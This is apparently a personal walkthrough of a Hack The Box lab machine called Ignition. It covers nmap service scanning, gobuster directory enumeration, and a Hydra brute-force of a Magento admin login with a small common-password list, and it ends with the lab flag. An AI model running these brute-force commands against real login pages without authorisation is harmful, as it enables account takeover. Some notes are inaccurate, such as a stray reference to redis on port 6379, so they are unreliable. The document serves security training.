06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 80/tcp open  http    nginx 1.14.2
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Did not follow redirect to http://ignition.htb/

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-enum: 
 |   /setup/: Potentially interesting folder
 |_  /soap/: Potentially interesting folder

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
 Hmm. We’re having trouble finding that site.
 We can’t connect to the server at ignition.htb.
 
 * ip address redirected to http://ignition.htb
 
root@htb:~$ curl -v {targetIP:port}
 *   Trying 10.129.208.53:80...
 * Connected to 10.129.208.53 (10.129.208.53) port 80 (#0)
 > GET / HTTP/1.1
 > Host: 10.129.208.53
 > User-Agent: curl/7.88.1
 > Accept: */*
 > 
 < HTTP/1.1 302 Found
 < Server: nginx/1.14.2
 < Date: Sat, 22 Feb 2025 12:37:38 GMT
 < Content-Type: text/html; charset=UTF-8
 < Transfer-Encoding: chunked
 < Connection: keep-alive
 < Set-Cookie: PHPSESSID=5377km0035lm9f1hpf62b1a5q8; expires=Sat, 22-Feb-2025 13:37:38 GMT; Max-Age=3600; path=/; domain=10.129.208.53; HttpOnly; SameSite=Lax
 < Location: http://ignition.htb/
 
 * target site is expecting a FQDN instead of IP Address as stated...
    - HTTP/1.1 302 Found...Location http://ignition.htb/
 
root@htb:~$ echo "10.129.208.53     ignition.htb" | sudo tee -a /etc/hosts
 10.129.208.53     ignition.htb
 
root@htb:~$ BROWSER > http://ignition.htb

 * possible vulnerable entry points
    - sign-in form
    - create account form
    - subcribe form
    - orders & returns form
    - contact web form
    - advanced search form
#directory enumeration
root@htb:~$ find / -iname directory-list* 2>/dev/null
 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
 /usr/share/dirbuster/wordlists/directory-list-1.0.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

root@htb:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@htb:~$ which gobuster
 /usr/bin/gobuster

root@htb:~$ gobuster dir -u http://ignition.htb -w directory-list-2.3-small.txt
 /contact              (Status: 200) [Size: 28673]
 /home                 (Status: 200) [Size: 25802]
 /media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]
 /0                    (Status: 200) [Size: 25803]
 /catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]
 /static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]
 /admin                (Status: 200) [Size: 7092]
 /Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]
 ...
 
 * the vhost represents virtual host routing
 * the -w represents the path to the wordlist
 * the -u represents the target URL
 * the --append-domain option is only required when conducting subdomain enumeration NOT directory brute forcing
#conduct OSINT
root@htb:~$ BROWSER > googleSearch
 search: magento
 
 * Magento is a free, open-source e-commerce platform that helps businesses create and manage online stores. It's written in PHP and uses the Open Software Licens
 
root@htb:~$ BROWSER > googleSearch
 search: magento default credentials
  username: admin

root@htb:~$ BROWSER > googleSearch
 search: most common password list
 ...

root@htb:~$ nano commonPWs.txt
 admin123
 root123
 password1
 administrator1
 changeme1
 password123
 qwerty123
 administrator123
 changeme123
 
#brute force

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL:ignition/admin
 
 Requests
 ...
 POST /admin HTTP/1.1
 Host: ignition.htb
 Content-Length: 78
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://ignition.htb
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://ignition.htb/admin
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: admin=cd4juor0dcuu0pid746li0jdqr
 Connection: close

 form_key=vEO8avkyPjmLQrhI&login%5Busername%5D=admin&login%5Bpassword%5D=qerty1

root@htb:~$ hydra -l admin -P commonPWs.txt ignition.htb http-post-form "/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302"
 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-22 07:31:36
 [DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:1/p:9), ~1 try per task
 [DATA] attacking http-post-form://ignition.htb:80/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302
 [80][http-post-form] host: ignition.htb   login: admin   password: root123
 [80][http-post-form] host: ignition.htb   login: admin   password: changeme123
 [80][http-post-form] host: ignition.htb   login: admin   password: password123
 [80][http-post-form] host: ignition.htb   login: admin   password: changeme1
 [80][http-post-form] host: ignition.htb   login: admin   password: administrator1
 [80][http-post-form] host: ignition.htb   login: admin   password: administrator123
 [80][http-post-form] host: ignition.htb   login: admin   password: admin123
 [80][http-post-form] host: ignition.htb   login: admin   password: password1
 [80][http-post-form] host: ignition.htb   login: admin   password: qwerty123
 1 of 1 target successfully completed, 9 valid passwords found

 * the user=^USER^&pass=^PASS^ represents the form parameter
    - the specific format can be retrieved via Burp Suite or through the Browser's dev tools
    - the S=302 is used to look for a successful login indicated by the HTTP status code 302
       - Looking for a successful login indicated by the HTTP status code 302 is 
         necessary because, in many web applications, successful authentication 
         does not directly return a 200 OK response. Instead, it often redirects 
         the user to a different page after login, which is signified by 
         the 302 Found status code.
         
  * Congratulations, your flag is: 797d6c988d9dc5865e010b9410f247e0

Last updated